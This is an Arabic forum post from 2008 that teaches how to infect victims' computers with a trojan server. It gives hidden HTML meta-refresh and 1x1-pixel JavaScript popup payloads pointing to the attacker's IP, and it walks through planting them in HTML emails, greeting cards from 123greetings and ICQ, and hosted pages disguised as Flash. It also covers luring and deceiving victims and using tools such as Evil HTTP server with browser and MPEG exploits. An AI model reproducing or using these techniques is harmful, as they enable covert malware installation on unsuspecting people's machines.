dri2s
عضو فعال
عدد الرسائل : 78
العمر : 30
Localisation : Sous
نقاط : 57370
تاريخ التسجيل : 02/09/2008
 |  موضوع: اسئلة واجوبه مهمة جدا ً لأختراق الاجهزة  2008-09-04, 10:45 | |
| .::.... الأسئلة ....::.
1.كيف أجعل السيرفر يتحمل بدون اعطاء اللنك للضحية و كيف تعمل كل هذه الطرق ؟؟؟
2. كيف أبعث ايميل عند فتحه تقوم برامج ينزل السيرفر للضحية ؟؟؟
3. كيف أبعثه أيضا في شكل Greeting card حتى لا يشك الضحية ؟؟؟
4. كيف أبعثه في ال ICQ بحيث تقوم ينزل السيرفر للضحية ؟؟
5. كيف أعطي الضحية صفحة انترنت ملغمة بنفس الطرق
( حتى لا تضطرالى اعطاء الأي بي الخاص بيك.. ) .::....الاجابات ....::. .::.... الاجابة 1 : الفكرة و ديناميكية العمل :
هي طبعا مش اننا بنلغم الصفحات او الايملات او اي حاجة.. لأ بنستخدم أفكار عشان الضحية مياخدش باله
الفكرة الأولى..:
كود تحويل ...انت مش هتحول لصفحة انترنت انت هتحول للنك اللي فيه الأيبي الخاص بيك مثلا :
<http://127.0.0.1/1.jpg> يفضل الامتداد في الأخر يكون JPG. اول لما يفتح الايميل هيتحول و ينفتح السيرفر في جهازه.. الطريقة 100% شغالة الا اذا كان الضحية عارف الثغرة اللي في المتصفح اللي بتستخدمها البرامج اللي قلت عنها ^^^ .. و مغلقها او عامل UPDATE او انه خواف جدا و مغلقها لخوفه الشديد و بيبحث عن الأمان الدائم...
طبعا انت تقدر تستخدم الفكرة في أي خدمة تدعم ال HTML ( غير : 127.0.0.1 بالأي بي بتاعك ).
meta http-equiv=Refresh content="0; url=http://127.0.0.1/1.jpg">
..........................
الفكرة الثانية المطورة :
طبعا لا أقصد اني اخترعت اختراع او اكتشاف لكن جه في بالي كود HTML تاني أفضل
طبعا احنا في الطريقة الاولى كنا بنستخدم التحويل لكن مش شايفين ان التحويل ممكن يشكك الضحية !!!
ايه رأيكم في حل عشان الضحية مش يشك..
صفحة انترنت تفتح بمجرد ما يفتح الضحية يوصل الضحية الطريقة اللي انت مستخدمها.. زي ايميل او صفحة او icq او اي حاجة من الطرق...
هدي المثال على الايميل...
مثلا دلوقتي لو انت وصلك ايميل و حمل الايميل و فجأة لقيت الصفحة بتحولك على اي حاجة تانية !!
ممكن تشك و تعمل STOP للتحميل صح!!
ايه الحل.؟؟؟؟ انا دايما عندي الحل
شوف الكود التاني ده بيفتح الصفحة في أقصى اسفل يسار الشاشة و لا تظهر الصفحة.. و الصفحة حجمها :
1 في 1 pixels يعني متجيش حجم نقطة.. لكن شغالة 100%
الصفحة هتفتح و طبعا انت تكون محدد الموقع اللي هتفتح عليه.. مثلا <http://www.google.com/>
لكن احنا مش محتاجين الموقع في حاجة..
احنا محتاجين نحط اللنك اللي فيه ال IP بتاعك مثلا : <http://127.0.0.1/1.jpg>
اول لما تفتح الصفحة...... خلاص أصبح ضحيتك..
الكود :
SCRIPT LANGUAGE='JavaScript'>window.open('http://127.0.0.1/1.jpg','','left=1000,top=1000,width=1,height=1');</SCRIPT>
تغير 127.0.0.1 بالأي بي الخاااااص بيك..
..................................................
.::.... الاجابة 2 ....::.
في ناس كثيرة بتسمع و ب انه في ايميلات ملغومة و اول لما تفتح الايميل يتحمل عندك فيروس او سيرفر.. ده كان بثغرة المتصفح بـ ACTIVE X
لكن احنا طريقتنا سلسة سهلة سريعة و فعالة.
الخطوات......... :
1 : لازم يكون عندك ايميل في الياهو لأننا نحتاج لأيميل يدعم الHTML
(الفاهمين اول لما قرأوا HTML أكيد فهموا كل شئ.. )
2 : بعد ما تدخل الايميل : اعمل COMPOSE أي اكتب رسالة جديدة..
و في أسفل خانة كتابة الرسالة على اليمين.. ستجد رز تفعيل ال HTML
فعلها و اكتب ايميلك.. اكتب الايميل اللي انت عايزه و حاول تخليها حاجة ملفتة للنظر مثلا
العنوان : قتل زوجته و اتجه لذبح أولاده.. ههههه
أهم شئ في الرسالة : كتابة الكود الأول او الثاني ( يفضل الثاني ) :
الاول :
meta http-equiv=Refresh content="0; url=http://127.0.0.1/1.jpg">
الثاني :
SCRIPT LANGUAGE='JavaScript'>window.open('http://127.0.0.1/1.jpg','','left=1000,top=1000,width=1,height=1');</SCRIPT>
3. اكتب ايميل الضحية و المعلومات الباقية و كل حاجة و ارسل..
..................................................
.::.... الاجابة 3 ....::.
طبعا كل الناس تفرح لما يبعث لها Greeting card
هنتكلم عن <http://www.123greetings.com/>
الموقع يدعم ال HTML في كروته الرائعة..
اذا أردت أن توقع بضحية في قبضتك استعمل الطرق اللي ذكرتها انا البرامج و كدا..
1. تدخل الموقع الموضح أعلاه.. أحلى ما فيه لا يحتاج اشتراك او غيره..
2. اختر أي كارد من أي نوع صداقة , حب , اهداء, على راحتك.. مع مراعاة جنس المستقبل يعني :
افرض بنت تبعث بإسم ولد او بنت اما لو ولد لازم بنت ههههههه
3. ادخل و بعد ما تكتب الايميل و المعلومات و كل حاجة.... في الرسالة الخاصة اللي بتكتبها لمستلم
الكارد..ضع الكود الأول او الثاني ( يفضل الثاني ) :
الاول :
meta http-equiv=Refresh content="0; url=http://127.0.0.1/1.jpg">
الثاني :
SCRIPT LANGUAGE='JavaScript'>window.open('http://127.0.0.1/1.jpg','','left=1000,top=1000,width=1,height=1');</SCRIPT>
meta http-equiv=Refresh content="0; url=http://127.0.0.1/1.jpg">
و ارسله.. الأن عند فتح الضحية للايميل سيجد انه لديه كارد جديد مرسل. هيفتح الايميل و يدخل على اللنك اللي فيه الكاردفي الموقع لكن اول لما يفتح الكارد ( مبررروك أصبح ضحيتك )..
..................................................
.::.... الاجابة 4 ....::.
لازم يكون عندك ICQ
الخطوات........... :
1. اختر greeting card من قائمة اليوزر.. يعني اضغط على اليوزر نيم بتاع الضحية و اختارها..
2. و في الكروت اختر من الموضحة : Just Because
و العنوان title اختار smile او all smile
3. و في مكان كتابة الرسالة عليك و على الكود لكن لا تلصقه في اولها
يعني دوس ENTER عشرين مرة مثلا و اكتب الكود في الآخر..
الحكاية دي موجودة الاصدارات القديمة فقط تقريبا.. انا عندي 2001b موجودة
الكود الأول او الثاني ( يفضل الثاني ) :
الاول :
meta http-equiv=Refresh content="0; url=http://127.0.0.1/1.jpg">
الثاني :
SCRIPT LANGUAGE='JavaScript'>window.open('http://127.0.0.1/1.jpg','','left=1000,top=1000,width=1,height=1');</SCRIPT>
.................................................. .
.::.... الاجابة 5 ....::.
طبعا البرامج الموضحة أعلاه قلنا تقوم بفتح جهازك كسيرفر تحميل لذا يجب اعطاء الأي بي للضحية كصفحة انترنت او صورة مثلا : <http://127.0.0.1/1.jpg> و تقوله دي صورتي لكن طبعا مين الغبي اللي يدي الأيبي بتاعه لأي أحد مهما كان مبتدئاً ؟؟
الطريقة دي تغنيك عن اعطاء اللنك اللي فيه الأي بي للضحية.. و كمان اذا استخدمت الكود التاني افضل لو مثلا عامل صفحة و فيها فلاش و اديتها للضحية و قلتله شوف الفلاش و قولي ايه رأيك هيفتح الصفحة الكود هيفتح صفحة جانبية مش ظاهرة و يعمل شغله.. و الفلاش هيظهر عادي و انتوا و أفكاركم...
الخطوات :.........
1. افتح برنامج تحرير صفحات انترنت.. Front Page او اذا مفيش عندك نكتفي بال NotePad
2. بكل سهولة لو في برنامج Front Page ادخل قسم ال HTML و لو في notepad حط على طول..
راعي تغيير الصيغة : 127.0.0.1 بالأيبي الخاص بك..
الكود الأول او الثاني ( يفضل الثاني ) :
الاول :
meta http-equiv=Refresh content="0; url=http://127.0.0.1/1.jpg">
الثاني :
SCRIPT LANGUAGE='JavaScript'>window.open('http://127.0.0.1/1.jpg','','left=1000,top=1000,width=1,height=1');</SCRIPT>
و احفظ الصفحة و حملها على موقع اسضافة مثلا : <http://www.geocities.com/>
في ال notepad لحفظ الصفحة بإمتداد html يجب عمل الأتي اكتب الاسم بالإمتداد new.html
تحت خانة كتابة الاسم : هتلاقي الاختيار على Text Documents اضغط عليها و اختار All Files (*.*)
\
ملحوظـــــــــــــــــات مهمـــــــــــة يجب قراءتهــــــا :
1. الأكواد كلها ناقصة.. tags اتبعوا النصايح
و أضف ال TAG ده في أول الكود : " < " من غير علامات التنصيص.. و كمان راعي الكتابة العربية يعني لما تنسخ ال TAG ده في ملف النوت باد الجديد هتلاحظ ان اتجاهه اختلف..
عشان كدا الأكواد و ال TAG تنسخها في ملف جديد..
........
2. اخواني مستخدمين الاتصال العادي : modem dialup connection راعوا تغيير الأي بي.. يعني مش واحد يبعث الايميل بكود التحويل و فيه الأي بي و يطلع برا الانترنت و يدخل بعدين و يسأل الضحية وصلك الايميل و هو بيدحك عشان اخترقه.. بعدين يحاول يعمل connect...
يفضل استخدام جميع الطرق المذكورة و الضحايا اونلاين.. لأن الأي بي الخاص بيك يتغير الا اذا انت معاك أي بي ثابت واخده من مزود الخدمة ISP... و كمان البرنامج لازم يكون شغاااااااال...
اما بالنسبة لمستخدمي ال DSL ممكن تسيب الكمبيور مفتوح و البرنامج مفتوح و اول لما الضحية يفتح هيشتغل عادي......
و كمان راعوا ان الثغرة ممكن تكون مغلقة في كمبيوتر الضحية... مع برنامج Evil http server يمكنك تغيير الثغرة... و أنا سأقوم بتوضيح لاحظته اذا كنت تعلم ان الضحية يستخدم XP استخدم برنامج auto-download
اما غير ذلك حاول ببرنامج Evil http بثغرة ال MPEG لأنها الأكثر انتشارا.. | |
|
